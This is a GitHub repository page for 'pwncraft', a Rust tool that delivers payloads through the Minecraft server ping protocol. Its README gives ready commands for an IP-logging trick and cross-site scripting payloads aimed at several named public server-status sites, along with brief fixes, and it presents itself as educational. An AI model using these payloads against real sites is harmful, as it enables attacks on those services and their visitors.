Skip to content

A Rust program to deliver leet payloads through Minecraft SLP protocol

Notifications You must be signed in to change notification settings

Traumatism/pwncraft

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PwnCraft 🏴‍☠️

A tool built to deliver malicious payloads through Minecraft SLP protocol. Made for educational purpose, for preventing people from getting attacked by this.

Example usages

Use https://crafty.gg as an IP logger

Fix: Accept only favicon that starts with png,base64...

  • https://crafty.gg/tools/ping?ip=YOUR_IP&port=YOUR_PORT&platform=java

  • ./pwncraft localhost 1337 -f 'https://CANARY/'

XSS on https://api.serveurs-minecraft.com/

  • https://api.serveurs-minecraft.com/api.php?Favicon_Ping&ip=YOUR_IP&port=YOUR_PORT

  • ./pwncraft localhost 1337 -f '\"><script>alert(\"XSS\");</script><!--'

XSS on https://minecraft-api.com

Fix: HTML escape data from server

  • https://minecraft-api.com/api/ping/YOUR_IP/YOUR_PORT

  • ./pwncraft localhost 1337 -d '<script>alert(0);</script>'

About

A Rust program to deliver leet payloads through Minecraft SLP protocol

Topics

Resources

Stars

Watchers

Forks

Languages